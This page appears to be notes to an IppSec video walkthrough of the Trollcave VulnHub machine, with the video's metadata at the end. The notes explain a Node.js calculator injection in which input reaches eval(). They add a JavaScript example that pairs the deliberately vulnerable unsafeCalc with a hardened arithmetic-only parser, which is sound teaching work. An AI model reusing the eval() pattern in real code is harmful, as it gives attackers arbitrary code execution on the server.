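The calculator bug the video walks through is the classic one: a query-string value split on "=" and handed straight to eval(), so anything that is valid JavaScript runs inside the Node process. The block below is an added example written for this page, not IppSec's code and not the Trollcave calc.js; the function names (unsafeCalc, safeCalc) and the sample query strings are constructed for the demonstration. It puts the eval() pattern next to a replacement that parses arithmetic itself (numbers, + - * /, unary minus, parentheses) and rejects every other token, which is the fix a defender would want: there is no code path that can reach require(), process, or any other API.

```javascript
// Added example (not code from the video or the Trollcave VM).
// unsafeCalc mirrors the vulnerable pattern described in the walkthrough;
// safeCalc is the hardened replacement. Names and inputs are constructed.

// Vulnerable pattern: everything after "sum=" goes to eval().
// A benign probe such as "sum=typeof process" already shows that
// arbitrary JavaScript executes with the server's privileges.
function unsafeCalc(query) {
  const expr = query.split('=')[1]; // "sum=1+1" -> "1+1"
  return String(eval(expr));       // never do this with user input
}

// Hardened replacement: a small recursive-descent parser that only
// understands arithmetic. Unknown characters become single-char tokens
// via the \S fallback and are rejected, whitespace is skipped, and any
// leftover input after a complete expression is an error.
function safeCalc(query) {
  const idx = query.indexOf('=');
  if (idx === -1) throw new Error('missing "="');
  const expr = query.slice(idx + 1);
  const tokens = expr.match(/\d+(?:\.\d+)?|[-+*\/()]|\S/g) || [];
  let pos = 0;
  const peek = () => tokens[pos];
  const next = () => tokens[pos++];

  function primary() {
    const t = next();
    if (t === undefined) throw new Error('unexpected end of expression');
    if (t === '(') {
      const v = expression();
      if (next() !== ')') throw new Error('expected )');
      return v;
    }
    if (t === '-') return -primary();          // unary minus
    if (/^\d/.test(t)) return Number(t);       // numeric literal
    throw new Error(`rejected token: ${t}`);   // letters, quotes, ';', etc.
  }
  function term() {
    let v = primary();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = primary();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expression() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      const op = next();
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  }

  const result = expression();
  if (pos !== tokens.length) {
    throw new Error(`trailing input: ${tokens.slice(pos).join(' ')}`);
  }
  return String(result);
}

// Returns true when safeCalc refuses the query, for quick checks.
function rejects(query) {
  try { safeCalc(query); return false; } catch (e) { return true; }
}

module.exports = { unsafeCalc, safeCalc, rejects };
```

Note that the parser also sidesteps the "+ becomes a space" problem seen in the video only if the caller URL-decodes correctly before calling it; the point of the example is the evaluation step, so decoding is left to the web framework.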
Info
Channel: IppSec
Views: 12,861
Keywords: rails, nodejs, file upload, path traversal, ssh key, ippsec, VulnHub, command injection, eval, learn2code, python, CVE-2017-16995, Kernel, XSS, Cookie Theft
Id: 2EW78bkwztg
Length: 103min 40sec (6220 seconds)
Published: Sun Apr 15 2018